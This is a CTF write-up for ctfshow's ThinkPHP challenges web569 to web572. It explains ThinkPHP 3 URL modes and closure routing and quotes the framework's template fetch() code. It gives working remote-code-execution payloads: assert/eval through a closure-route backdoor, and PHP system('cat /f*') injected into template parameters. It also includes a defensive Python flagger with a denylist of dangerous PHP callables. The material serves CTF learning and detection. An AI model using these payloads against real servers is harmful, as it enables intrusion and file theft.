Ctfshow ThinkPHP topic 1
2022-07-24 11:21:00 【ThnPkm】
web569
Before tackling this question, a word about the URL modes of ThinkPHP 3. ThinkPHP supports four URL modes: common mode, PATHINFO, REWRITE and compatibility mode.
An entry file is the single entry point of an application: every request to the application is directed to its entry file, and the system parses the module, controller and operation of the current request from the URL parameters:
http://serverName/index.php/module/controller/operation
-- Common mode:
The common mode is the traditional way of passing GET parameters to specify the module and operation currently being accessed, for example:
http://localhost/?m=home&c=user&a=login&var=value
The m parameter represents the module, c the controller and a the operation (these parameter names can of course be configured); the remaining ones are ordinary GET parameters.
-- PATHINFO mode:
PATHINFO mode is the system's default URL mode. It provides the best SEO support, and the system does the environment-compatibility work internally, so most host environments are supported. The URL corresponding to the one above, in PATHINFO mode, is:
http://localhost/index.php/home/user/login/var/value
The first three parameters of a PATHINFO address represent module/controller/operation.
-- REWRITE mode:
REWRITE mode adds rewrite-rule support on top of PATHINFO mode. It allows the entry file index.php to be removed from the URL, but requires extra configuration of the web server's rewrite rules.

Back to question 569: it requires PATHINFO-mode access, so the payload is simple (URL matching is case insensitive by default).
payload:
http://671a5ba9-1876-433b-85fd-ed8f400f61fa.challenge.ctf.show/index.php/Admin/Login/ctfshowLogin
web570

Supplementary routing knowledge
With the routing feature you can make your URL addresses more concise and elegant. ThinkPHP supports routing of module URL addresses (routing is designed for PATHINFO mode and compatibility-mode URLs; the common URL mode is not supported for the time being).
ThinkPHP's routing features include:
- Regular routing
- Rule routing
- Static routing (URL mapping )
- Closure support
Closure definition
We can use closures to define routes with special requirements, without having to execute a controller's operation method, for example:
'URL_ROUTE_RULES'=>array(
    'test' => function(){ echo 'just test'; },
    'hello/:name' => function($name){ echo 'Hello,'.$name; }
)
When we visit the URL http://url/index.php/test, the browser outputs:
just test
When we visit the URL http://url/index.php/jack, the browser outputs:
Hello jack
In Application/Common/Conf/config.php we find a closure-route backdoor.
When we visit url/index.php/ctfshow/aaa/bbb, the function call_user_func(aaa,bbb) is executed.
PHP function details: call_user_func() usage - djiz - Blog Garden
call_user_func(aaa,bbb) calls the function aaa() with bbb as its argument.
When passing parameters via GET, characters such as ; and / cannot be transmitted in the path, so the parameter can be passed like this instead:
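An added example (not code from the write-up, from ThinkPHP or from the challenge): a small Python normaliser that reduces the four URL modes described under web569 to module/controller/action plus parameters, then flags the two request shapes this page turns on, a callable name reaching call_user_func() through the ctfshow closure route and a PHP open tag inside a parameter, the way a request-log review would. The denylist of callables, the ctfshow route prefix as a constant and the sample URLs in the test are assumptions.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: callables a closure route feeding call_user_func() should never reach.
DANGEROUS_CALLABLES = {"assert", "eval", "system", "exec", "passthru", "shell_exec"}
CLOSURE_ROUTE = "ctfshow"  # prefix of the closure route the write-up describes


def parse_thinkphp_url(url, var_pathinfo="s"):
    """Return (mode, segments, params) for a ThinkPHP 3 style URL.

    segments are module/controller/action (or, for the closure route, the
    route prefix and its :aaa/:bbb placeholders); PATHINFO segments after
    the third are read in var/value pairs, as in the write-up's examples.
    var_pathinfo mirrors VAR_PATH_INFO from convention.php.
    """
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    path = unquote(parts.path)
    if var_pathinfo in query:                     # compatibility: ?s=/m/c/a/var/value
        mode, pathinfo = "compat", query.pop(var_pathinfo)
    elif "/index.php" in path:                    # PATHINFO: /index.php/m/c/a/var/value
        mode, pathinfo = "pathinfo", path.split("/index.php", 1)[1]
    elif {"m", "c", "a"} & set(query):            # common: ?m=home&c=user&a=login
        mode, pathinfo = "common", "/".join(query.pop(k, "") for k in ("m", "c", "a"))
    else:                                         # REWRITE: entry file stripped by the server
        mode, pathinfo = "rewrite", path
    segs = [s for s in pathinfo.split("/") if s]
    rest = segs[3:]
    params = dict(query)
    params.update(zip(rest[0::2], rest[1::2]))    # /var/value pairs become parameters
    return mode, segs[:3], params


def flag_request(url):
    """List the reasons a request matches the patterns shown on this page."""
    _mode, segs, params = parse_thinkphp_url(url)
    lowered = [s.lower() for s in segs]           # URL matching is case-insensitive by default
    reasons = []
    if len(lowered) >= 2 and lowered[0] == CLOSURE_ROUTE and lowered[1] in DANGEROUS_CALLABLES:
        reasons.append("closure route passes %s() to call_user_func" % lowered[1])
    for name, value in params.items():
        if "<?php" in value.lower() or "<?=" in value:
            reasons.append("PHP open tag in parameter %r" % name)
    return reasons
```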
#get
url/index.php/ctfshow/assert/eval($_POST[1])
#post
1=system('cat /fla*');
web571
ThinkPHP 3.2.3 vulnerability reproduction - Anquanke, security information platform

In Home\Controller\IndexController, the index operation receives a controllable parameter.

Following it all the way into fetch(), and then into Hook::listen('view_parse', $params):
public function fetch($templateFile='',$content='',$prefix='') {
    if(empty($content)) {
        $templateFile = $this->parseTemplate($templateFile);
        // The template file does not exist: return directly
        if(!is_file($templateFile)) E(L('_TEMPLATE_NOT_EXIST_').':'.$templateFile);
    }else{
        defined('THEME_PATH') or define('THEME_PATH', $this->getThemePath());
    }
    // Page caching
    ob_start();
    ob_implicit_flush(0);
    if('php' == strtolower(C('TMPL_ENGINE_TYPE'))) { // Use the PHP native template engine
        $_content = $content;
        // Template array variables are decomposed into independent variables
        extract($this->tVar, EXTR_OVERWRITE);
        // Load the PHP template directly; a non-empty $content is evaluated as PHP
        empty($_content)?include $templateFile:eval('?>'.$_content);
    }else{
        // View parsing tag
        $params = array('var'=>$this->tVar,'file'=>$templateFile,'content'=>$content,'prefix'=>$prefix);
        Hook::listen('view_parse',$params);
    }
    // Get and clear the output buffer
    $content = ob_get_clean();
    // Content filter tag
    Hook::listen('view_filter',$content);
    // Output the template content
    return $content;
}

yu22x:
You can see that our incoming n, that is, content, will enter the eval function when TMPL_ENGINE_TYPE is php.
So we can directly pass PHP code.
payload:
?n=<?php system('cat /f*');?>
web572
This question requires brute-forcing to obtain the key information, not scanning; the number of attempts must not exceed 365, otherwise the result is invalid.

Once the date has been brute-forced, we can see from ?showctf that RCE is possible.
/index.php?showctf=<?php system("cat /f*");?>